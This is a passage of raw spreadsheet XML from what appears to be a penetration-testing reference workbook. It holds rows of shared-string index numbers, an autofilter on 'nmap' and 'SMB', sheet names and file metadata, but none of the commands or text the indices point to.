        <v>19</v>
      </c>
      <c r="F227" t="s">
        <v>15</v>
      </c>
      <c r="G227" t="s">
        <v>196</v>
      </c>
      <c r="I227">
        <f>SUM(E227:H227)</f>
        <v>0</v>
      </c>
    </row>
    <row r="228" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A228" t="s">
        <v>31</v>
      </c>
      <c r="B228" t="s">
        <v>200</v>
      </c>
      <c r="C228" t="s">
        <v>201</v>
      </c>
      <c r="D228" t="s">
        <v>8</v>
      </c>
      <c r="E228" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F228" t="s">
        <v>15</v>
      </c>
      <c r="G228" t="s">
        <v>199</v>
      </c>
      <c r="I228">
        <f>SUM(E228:H228)</f>
        <v>0</v>
      </c>
    </row>
    <row r="229" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A229" t="s">
        <v>31</v>
      </c>
      <c r="B229" t="s">
        <v>193</v>
      </c>
      <c r="C229" t="s">
        <v>228</v>
      </c>
      <c r="D229" t="s">
        <v>8</v>
      </c>
      <c r="E229" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F229" t="s">
        <v>15</v>
      </c>
      <c r="G229" t="s">
        <v>229</v>
      </c>
    </row>
    <row r="230" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A230" t="s">
        <v>31</v>
      </c>
      <c r="B230" t="s">
        <v>193</v>
      </c>
      <c r="C230" t="s">
        <v>227</v>
      </c>
      <c r="D230" t="s">
        <v>8</v>
      </c>
      <c r="E230" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F230" t="s">
        <v>15</v>
      </c>
      <c r="G230" t="s">
        <v>226</v>
      </c>
    </row>
    <row r="231" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A231" t="s">
        <v>31</v>
      </c>
      <c r="B231" t="s">
        <v>193</v>
      </c>
      <c r="C231" t="s">
        <v>231</v>
      </c>
      <c r="D231" t="s">
        <v>8</v>
      </c>
      <c r="E231" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F231" t="s">
        <v>15</v>
      </c>
      <c r="G231" t="s">
        <v>230</v>
      </c>
      <c r="I231">
        <f t="shared" ref="I231:I236" si="6">SUM(E231:H231)</f>
        <v>0</v>
      </c>
    </row>
    <row r="232" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A232" t="s">
        <v>31</v>
      </c>
      <c r="B232" t="s">
        <v>193</v>
      </c>
      <c r="C232" t="s">
        <v>233</v>
      </c>
      <c r="D232" t="s">
        <v>8</v>
      </c>
      <c r="E232" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F232" t="s">
        <v>15</v>
      </c>
      <c r="G232" t="s">
        <v>232</v>
      </c>
      <c r="I232">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="233" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A233" t="s">
        <v>31</v>
      </c>
      <c r="B233" t="s">
        <v>193</v>
      </c>
      <c r="C233" t="s">
        <v>234</v>
      </c>
      <c r="D233" t="s">
        <v>8</v>
      </c>
      <c r="E233" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F233" t="s">
        <v>15</v>
      </c>
      <c r="G233" t="s">
        <v>235</v>
      </c>
      <c r="I233">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="234" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A234" t="s">
        <v>31</v>
      </c>
      <c r="B234" t="s">
        <v>501</v>
      </c>
      <c r="C234" t="s">
        <v>503</v>
      </c>
      <c r="D234" t="s">
        <v>8</v>
      </c>
      <c r="E234" t="s">
        <v>19</v>
      </c>
      <c r="F234" t="s">
        <v>15</v>
      </c>
      <c r="G234" t="s">
        <v>502</v>
      </c>
      <c r="I234">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="235" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A235" t="s">
        <v>31</v>
      </c>
      <c r="B235" t="s">
        <v>501</v>
      </c>
      <c r="C235" t="s">
        <v>505</v>
      </c>
      <c r="D235" t="s">
        <v>8</v>
      </c>
      <c r="E235" t="s">
        <v>19</v>
      </c>
      <c r="F235" t="s">
        <v>15</v>
      </c>
      <c r="G235" t="s">
        <v>504</v>
      </c>
      <c r="I235">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="236" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A236" t="s">
        <v>31</v>
      </c>
      <c r="B236" t="s">
        <v>48</v>
      </c>
      <c r="C236" t="s">
        <v>513</v>
      </c>
      <c r="D236" t="s">
        <v>8</v>
      </c>
      <c r="E236" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F236" t="s">
        <v>15</v>
      </c>
      <c r="G236" t="s">
        <v>516</v>
      </c>
      <c r="I236">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="237" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A237" t="s">
        <v>31</v>
      </c>
      <c r="B237" t="s">
        <v>52</v>
      </c>
      <c r="C237" t="s">
        <v>514</v>
      </c>
      <c r="D237" t="s">
        <v>8</v>
      </c>
      <c r="E237" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F237" t="s">
        <v>15</v>
      </c>
      <c r="G237" t="s">
        <v>515</v>
      </c>
    </row>
    <row r="238" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A238" t="s">
        <v>31</v>
      </c>
      <c r="B238" t="s">
        <v>61</v>
      </c>
      <c r="C238" t="s">
        <v>521</v>
      </c>
      <c r="D238" t="s">
        <v>8</v>
      </c>
      <c r="E238" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F238" t="s">
        <v>15</v>
      </c>
      <c r="G238" t="s">
        <v>567</v>
      </c>
    </row>
    <row r="239" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A239" t="s">
        <v>31</v>
      </c>
      <c r="B239" t="s">
        <v>522</v>
      </c>
      <c r="C239" t="s">
        <v>524</v>
      </c>
      <c r="D239" t="s">
        <v>8</v>
      </c>
      <c r="E239" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F239" t="s">
        <v>15</v>
      </c>
      <c r="G239" t="s">
        <v>525</v>
      </c>
      <c r="H239" t="s">
        <v>523</v>
      </c>
    </row>
    <row r="240" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A240" t="s">
        <v>538</v>
      </c>
      <c r="B240" t="s">
        <v>533</v>
      </c>
      <c r="C240" t="s">
        <v>568</v>
      </c>
      <c r="D240" t="s">
        <v>8</v>
      </c>
      <c r="E240" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F240" t="s">
        <v>15</v>
      </c>
      <c r="G240" t="s">
        <v>537</v>
      </c>
    </row>
    <row r="241" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A241" t="s">
        <v>31</v>
      </c>
      <c r="B241" t="s">
        <v>638</v>
      </c>
      <c r="C241" t="s">
        <v>657</v>
      </c>
      <c r="D241" t="s">
        <v>8</v>
      </c>
      <c r="E241" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F241" t="s">
        <v>15</v>
      </c>
      <c r="G241" t="s">
        <v>639</v>
      </c>
    </row>
    <row r="242" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A242" t="s">
        <v>172</v>
      </c>
      <c r="B242" t="s">
        <v>10</v>
      </c>
      <c r="C242" t="s">
        <v>74</v>
      </c>
      <c r="D242" t="s">
        <v>8</v>
      </c>
      <c r="E242" s="1" t="s">
        <v>75</v>
      </c>
      <c r="F242" t="s">
        <v>19</v>
      </c>
      <c r="G242" t="s">
        <v>245</v>
      </c>
    </row>
    <row r="243" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A243" t="s">
        <v>172</v>
      </c>
      <c r="B243" t="s">
        <v>10</v>
      </c>
      <c r="C243" t="s">
        <v>77</v>
      </c>
      <c r="D243" t="s">
        <v>8</v>
      </c>
      <c r="E243" s="1" t="s">
        <v>75</v>
      </c>
      <c r="F243" t="s">
        <v>19</v>
      </c>
      <c r="G243" t="s">
        <v>499</v>
      </c>
    </row>
    <row r="244" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A244" t="s">
        <v>172</v>
      </c>
      <c r="B244" t="s">
        <v>10</v>
      </c>
      <c r="C244" t="s">
        <v>69</v>
      </c>
      <c r="D244" t="s">
        <v>20</v>
      </c>
      <c r="E244" s="1" t="s">
        <v>76</v>
      </c>
      <c r="F244" t="s">
        <v>19</v>
      </c>
      <c r="G244" t="s">
        <v>246</v>
      </c>
    </row>
    <row r="245" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A245" t="s">
        <v>172</v>
      </c>
      <c r="B245" t="s">
        <v>10</v>
      </c>
      <c r="C245" t="s">
        <v>78</v>
      </c>
      <c r="D245" t="s">
        <v>20</v>
      </c>
      <c r="E245" s="1" t="s">
        <v>76</v>
      </c>
      <c r="F245" t="s">
        <v>19</v>
      </c>
      <c r="G245" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="246" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A246" t="s">
        <v>30</v>
      </c>
      <c r="B246" t="s">
        <v>22</v>
      </c>
      <c r="C246" t="s">
        <v>519</v>
      </c>
      <c r="D246" t="s">
        <v>19</v>
      </c>
      <c r="F246" t="s">
        <v>23</v>
      </c>
      <c r="G246" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="247" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A247" t="s">
        <v>631</v>
      </c>
      <c r="B247" t="s">
        <v>596</v>
      </c>
      <c r="C247" t="s">
        <v>633</v>
      </c>
      <c r="D247" t="s">
        <v>19</v>
      </c>
      <c r="E247" t="s">
        <v>19</v>
      </c>
      <c r="F247" t="s">
        <v>19</v>
      </c>
      <c r="G247" t="s">
        <v>632</v>
      </c>
    </row>
    <row r="248" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A248" t="s">
        <v>636</v>
      </c>
      <c r="B248" t="s">
        <v>79</v>
      </c>
      <c r="C248" t="s">
        <v>102</v>
      </c>
      <c r="D248" t="s">
        <v>19</v>
      </c>
      <c r="E248" t="s">
        <v>19</v>
      </c>
      <c r="F248" t="s">
        <v>19</v>
      </c>
      <c r="G248" t="s">
        <v>103</v>
      </c>
    </row>
    <row r="249" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A249" t="s">
        <v>637</v>
      </c>
      <c r="B249" t="s">
        <v>99</v>
      </c>
      <c r="C249" t="s">
        <v>100</v>
      </c>
      <c r="D249" t="s">
        <v>19</v>
      </c>
      <c r="E249" t="s">
        <v>19</v>
      </c>
      <c r="F249" t="s">
        <v>19</v>
      </c>
      <c r="G249" t="s">
        <v>101</v>
      </c>
    </row>
    <row r="250" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A250" t="s">
        <v>6</v>
      </c>
      <c r="B250" t="s">
        <v>10</v>
      </c>
      <c r="C250" t="s">
        <v>66</v>
      </c>
      <c r="D250" t="s">
        <v>19</v>
      </c>
      <c r="E250" t="s">
        <v>19</v>
      </c>
      <c r="F250" t="s">
        <v>19</v>
      </c>
      <c r="G250" t="s">
        <v>242</v>
      </c>
    </row>
    <row r="251" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A251" t="s">
        <v>30</v>
      </c>
      <c r="B251" t="s">
        <v>596</v>
      </c>
      <c r="C251" t="s">
        <v>597</v>
      </c>
      <c r="D251" t="s">
        <v>19</v>
      </c>
      <c r="E251" t="s">
        <v>19</v>
      </c>
      <c r="F251" t="s">
        <v>19</v>
      </c>
      <c r="G251" t="s">
        <v>595</v>
      </c>
    </row>
    <row r="252" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A252" t="s">
        <v>172</v>
      </c>
      <c r="B252" t="s">
        <v>156</v>
      </c>
      <c r="C252" t="s">
        <v>157</v>
      </c>
      <c r="D252" t="s">
        <v>8</v>
      </c>
      <c r="E252" t="s">
        <v>19</v>
      </c>
      <c r="F252" t="s">
        <v>19</v>
      </c>
      <c r="G252" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="253" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A253" t="s">
        <v>31</v>
      </c>
      <c r="B253" t="s">
        <v>193</v>
      </c>
      <c r="C253" t="s">
        <v>194</v>
      </c>
      <c r="D253" t="s">
        <v>19</v>
      </c>
      <c r="E253" t="s">
        <v>19</v>
      </c>
      <c r="F253" t="s">
        <v>19</v>
      </c>
      <c r="G253" t="s">
        <v>192</v>
      </c>
    </row>
    <row r="254" spans="1:7" hidden="1" x14ac:dyDescent="0.25"/>
    <row r="255" spans="1:7" hidden="1" x14ac:dyDescent="0.25"/>
  </sheetData>
  <autoFilter ref="A1:H255" xr:uid="{3E03BF46-D00A-42E6-B508-DA76C17C20ED}">
    <filterColumn colId="1">
      <filters>
        <filter val="nmap"/>
      </filters>
    </filterColumn>
    <filterColumn colId="5">
      <filters>
        <filter val="SMB"/>
      </filters>
    </filterColumn>
  </autoFilter>
  <hyperlinks>
    <hyperlink ref="H47" r:id="rId1" xr:uid="{18D5CF68-C105-41D2-8F0A-1A15367C35F6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1351C-67D1-412A-A1E6-04D3AE16DFB0}">
  <dimension ref="A2:A4"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="G11" sqref="G11"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="2" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A2" t="s">
        <v>359</v>
      </c>
    </row>
    <row r="3" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A3" t="s">
        <v>357</v>
      </c>
    </row>
    <row r="4" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A4" t="s">
        <v>580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A39F6-C9BA-4A57-865D-BEAC8E7EA109}">
  <dimension ref="A1:A9"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A24" sqref="A24"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="84.42578125" customWidth="1"/>
    <col min="2" max="2" width="80" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1" s="3" t="s">
        <v>173</v>
      </c>
    </row>
    <row r="2" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A2" s="3" t="s">
        <v>174</v>
      </c>
    </row>
    <row r="3" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A3" s="3" t="s">
        <v>175</v>
      </c>
    </row>
    <row r="4" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A4" s="3" t="s">
        <v>176</v>
      </c>
    </row>
    <row r="5" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A5" s="3" t="s">
        <v>177</v>
      </c>
    </row>
    <row r="6" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A6" s="3" t="s">
        <v>178</v>
      </c>
    </row>
    <row r="7" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="8" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>422</v>
      </c>
    </row>
    <row r="9" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A9" t="s">
        <v>506</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="A1" r:id="rId1" xr:uid="{0158151D-7FDD-41DB-803B-87B1172C9A8F}"/>
    <hyperlink ref="A2" r:id="rId2" xr:uid="{9196E0B7-2168-4782-AA9D-2A5F1280FB51}"/>
    <hyperlink ref="A3" r:id="rId3" xr:uid="{40C5C20F-FAEE-44F0-8E2A-F6520CC20B9F}"/>
    <hyperlink ref="A4" r:id="rId4" xr:uid="{99020126-30FC-4D3C-9803-8D0245626184}"/>
    <hyperlink ref="A5" r:id="rId5" xr:uid="{93E96214-886E-4DD6-A561-E41E451DDBEC}"/>
    <hyperlink ref="A6" r:id="rId6" xr:uid="{6291D2A6-B7EB-4808-9E44-320E273235F8}"/>
    <hyperlink ref="A7" r:id="rId7" xr:uid="{04591C07-D1B0-45C1-930F-2179A110C2AB}"/>
    <hyperlink ref="A8" r:id="rId8" xr:uid="{E2F33029-D74F-4739-A2D8-B16904904E6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pentest_db</vt:lpstr>
      <vt:lpstr>misc</vt:lpstr>
      <vt:lpstr>Resources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 Fox</dc:creator>
  <cp:lastModifiedBy>Travis Jerome</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-08-30T11:46:39Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-21T14:43:27Z</dcterms:modified>
</cp:coreProperties>
</file>